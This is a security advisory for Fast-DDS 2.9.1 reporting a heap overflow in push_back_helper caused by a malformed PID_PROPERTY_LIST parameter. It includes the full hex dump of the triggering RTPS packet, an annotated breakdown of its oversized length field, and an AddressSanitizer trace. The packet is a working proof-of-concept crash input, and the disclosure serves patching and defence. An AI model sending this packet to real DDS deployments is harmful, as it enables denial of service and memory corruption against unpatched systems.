
Another heap overflow in push_back_helper

MiguelCompany published GHSA-mf55-5747-c4pv Aug 11, 2023

Package

Fast-DDS

Affected versions

2.9.1

Patched versions

>= 2.11.1 / 2.10.2 / 2.9.2 / 2.6.6

Description

Summary

Even after the fix in 3492270, a malformed PID_PROPERTY_LIST parameter still causes a heap overflow, now at a different program counter.

Details

  • RTPS packet:
0000   52 54 50 53 02 02 ff ff 01 0f 45 d2 b3 f5 58 b9
0010   01 00 00 00 15 05 cc 00 00 00 10 00 00 01 00 c7
0020   00 01 00 c2 00 00 00 00 01 00 00 00 00 03 00 00
0030   15 00 04 00 02 02 00 00 16 00 04 00 01 0f 00 00
0040   50 00 10 00 01 0f 11 3e f6 42 cd 90 00 00 00 00
0050   00 00 01 c1 32 00 18 00 01 00 00 00 f2 1c 00 00
0060   00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 0f
0070   31 00 18 00 01 00 00 00 f3 1c 00 00 00 00 00 00
0080   00 00 00 00 00 00 00 00 0a 00 00 0f 02 00 08 00
0090   14 00 00 00 00 00 00 00 58 00 04 00 3f 0c 00 00
00a0   62 00 10 00 0a 00 00 00 70 75 62 6c 69 73 68 65
00b0   72 00 00 00 59 00 28 00 01 00 00 00 11 00 00 00
00c0   50 41 52 54 49 43 49 50 41 4e 54 5f 54 59 50 45
00d0   00 00 00 00 f3 ff ff ff 53 49 4d 50 4c 45 00 00
00e0   01 00 00 00
  • Bad parameter:
59 00 // PID_PROPERTY_LIST
28 00 // 40 bytes
01 00 // CDR_LE
00 00 // CDR opt

11 00 00 00 // size: 17
50 41 52 54 // <- data + padding
49 43 49 50 // -
41 4e 54 5f // -
54 59 50 45 // -
00 00 00 00 // ->

f3 ff ff ff // size: 4294967283
53 49 4d 50 4c 45 00 00 // data (insufficient)

  • Asan report:
=================================================================
==4118777==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000036020 at pc 0x000000474523 bp 0x7f2dfb4fb7a0 sp 0x7f2dfb4faf60
WRITE of size 17 at 0x602000036020 thread T3
    #0 0x474522 in memcpy (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x474522)
    #1 0x7f2e0147b492 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back_helper(unsigned char const*, unsigned int, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1518:15
    #2 0x7f2e0147b3e8 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back(unsigned char const*, unsigned int, unsigned char const*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1448:25
    #3 0x7f2e014a59a8 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_content_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:685:28
    #4 0x7f2e014a65b9 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:62:47
    #5 0x7f2e014bf0e2 in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)::operator()(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:571:111
    #6 0x7f2e014c064a in bool eprosima::fastdds::dds::ParameterList::readParameterListfromCDRMsg<eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)>(eprosima::fastrtps::rtps::CDRMessage_t&, eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short), bool, unsigned int&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterList.hpp:133:31
    #7 0x7f2e014bf5bb in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:652:58
    #8 0x7f2e0148c420 in eprosima::fastrtps::rtps::PDPListener::onNewCacheChangeAdded(eprosima::fastrtps::rtps::RTPSReader*, eprosima::fastrtps::rtps::CacheChange_t const*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:104:54
    #9 0x7f2e0112fa37 in eprosima::fastrtps::rtps::StatelessReader::change_received(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:329:52
    #10 0x7f2e01130cc7 in eprosima::fastrtps::rtps::StatelessReader::processDataMsg(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:557:33
    #11 0x7f2e0114ecc8 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)::operator()(eprosima::fastrtps::rtps::RTPSReader*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:202:39
    #12 0x7f2e01156309 in void eprosima::fastrtps::rtps::MessageReceiver::findAllReaders<eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*) const&) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:668:25
    #13 0x7f2e0114ed11 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:205:19
    #14 0x7f2e0115fee6 in void std::__invoke_impl<void, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(std::__invoke_memfun_deref, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:73:46
    #15 0x7f2e0115f279 in std::__invoke_result<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>::type std::__invoke<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:95:40
    #16 0x7f2e0115e3b4 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::__call<void, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, 0ul, 1ul, 2ul>(std::tuple<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>&&, std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/functional:400:24
    #17 0x7f2e0115d230 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, void>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/functional:484:24
    #18 0x7f2e0115bfad in std::_Function_handler<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)> >::_M_invoke(std::_Any_data const&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/std_function.h:300:37
    #19 0x7f2e0115a250 in std::function<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) const /usr/include/c++/9/bits/std_function.h:688:14
    #20 0x7f2e01152ef1 in eprosima::fastrtps::rtps::MessageReceiver::proc_Submsg_Data(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastrtps::rtps::SubmessageHeader_t*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:841:35
    #21 0x7f2e0114fa21 in eprosima::fastrtps::rtps::MessageReceiver::processCDRMsg(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::CDRMessage_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:418:45
    #22 0x7f2e01171827 in eprosima::fastrtps::rtps::ReceiverResource::OnDataReceived(unsigned char const*, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:132:27
    #23 0x7f2e012c2166 in eprosima::fastdds::rtps::UDPChannelResource::perform_listen_operation(eprosima::fastrtps::rtps::Locator_t) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:70:47
    #24 0x7f2e012c617c in void std::__invoke_impl<void, void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(std::__invoke_memfun_deref, void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:73:46
    #25 0x7f2e012c6028 in std::__invoke_result<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>::type std::__invoke<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:95:40
    #26 0x7f2e012c5f38 in void std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::_M_invoke<0ul, 1ul, 2ul>(std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/thread:244:26
    #27 0x7f2e012c5ebe in std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::operator()() /usr/include/c++/9/thread:251:31
    #28 0x7f2e012c5e8f in std::thread::_State_impl<std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> > >::_M_run() /usr/include/c++/9/thread:195:13
    #29 0x7f2e00149de3  (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd6de3)
    #30 0x7f2e005ef608 in start_thread /build/glibc-SzIz7B/glibc-2.31/nptl/pthread_create.c:477:8
    #31 0x7f2dffe34132 in clone /build/glibc-SzIz7B/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95

0x602000036020 is located 0 bytes to the right of 16-byte region [0x602000036010,0x602000036020)
allocated by thread T3 here:
    #0 0x4d9582 in calloc (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x4d9582)
    #1 0x7f2e0105275e in eprosima::fastrtps::rtps::SerializedPayload_t::reserve(unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/rtps/common/SerializedPayload.h:172:34
    #2 0x7f2e0147b3d2 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back(unsigned char const*, unsigned int, unsigned char const*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1444:28
    #3 0x7f2e014a59a8 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_content_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:685:28
    #4 0x7f2e014a65b9 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:62:47
    #5 0x7f2e014bf0e2 in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)::operator()(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:571:111
    #6 0x7f2e014c064a in bool eprosima::fastdds::dds::ParameterList::readParameterListfromCDRMsg<eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)>(eprosima::fastrtps::rtps::CDRMessage_t&, eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short), bool, unsigned int&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterList.hpp:133:31
    #7 0x7f2e014bf5bb in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:652:58
    #8 0x7f2e0148c420 in eprosima::fastrtps::rtps::PDPListener::onNewCacheChangeAdded(eprosima::fastrtps::rtps::RTPSReader*, eprosima::fastrtps::rtps::CacheChange_t const*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:104:54
    #9 0x7f2e0112fa37 in eprosima::fastrtps::rtps::StatelessReader::change_received(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:329:52
    #10 0x7f2e01130cc7 in eprosima::fastrtps::rtps::StatelessReader::processDataMsg(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:557:33
    #11 0x7f2e0114ecc8 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)::operator()(eprosima::fastrtps::rtps::RTPSReader*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:202:39
    #12 0x7f2e01156309 in void eprosima::fastrtps::rtps::MessageReceiver::findAllReaders<eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*) const&) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:668:25
    #13 0x7f2e0114ed11 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:205:19
    #14 0x7f2e0115fee6 in void std::__invoke_impl<void, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(std::__invoke_memfun_deref, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:73:46
    #15 0x7f2e0115f279 in std::__invoke_result<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>::type std::__invoke<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:95:40
    #16 0x7f2e0115e3b4 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::__call<void, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, 0ul, 1ul, 2ul>(std::tuple<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>&&, std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/functional:400:24
    #17 0x7f2e0115d230 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, void>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/functional:484:24
    #18 0x7f2e0115bfad in std::_Function_handler<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)> >::_M_invoke(std::_Any_data const&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/std_function.h:300:37
    #19 0x7f2e0115a250 in std::function<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) const /usr/include/c++/9/bits/std_function.h:688:14
    #20 0x7f2e01152ef1 in eprosima::fastrtps::rtps::MessageReceiver::proc_Submsg_Data(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastrtps::rtps::SubmessageHeader_t*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:841:35
    #21 0x7f2e0114fa21 in eprosima::fastrtps::rtps::MessageReceiver::processCDRMsg(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::CDRMessage_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:418:45
    #22 0x7f2e01171827 in eprosima::fastrtps::rtps::ReceiverResource::OnDataReceived(unsigned char const*, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:132:27
    #23 0x7f2e012c2166 in eprosima::fastdds::rtps::UDPChannelResource::perform_listen_operation(eprosima::fastrtps::rtps::Locator_t) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:70:47
    #24 0x7f2e012c617c in void std::__invoke_impl<void, void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(std::__invoke_memfun_deref, void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:73:46
    #25 0x7f2e012c6028 in std::__invoke_result<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>::type std::__invoke<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:95:40
    #26 0x7f2e012c5f38 in void std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::_M_invoke<0ul, 1ul, 2ul>(std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/thread:244:26
    #27 0x7f2e012c5ebe in std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::operator()() /usr/include/c++/9/thread:251:31
    #28 0x7f2e012c5e8f in std::thread::_State_impl<std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> > >::_M_run() /usr/include/c++/9/thread:195:13
    #29 0x7f2e00149de3  (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd6de3)


SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x474522) in memcpy

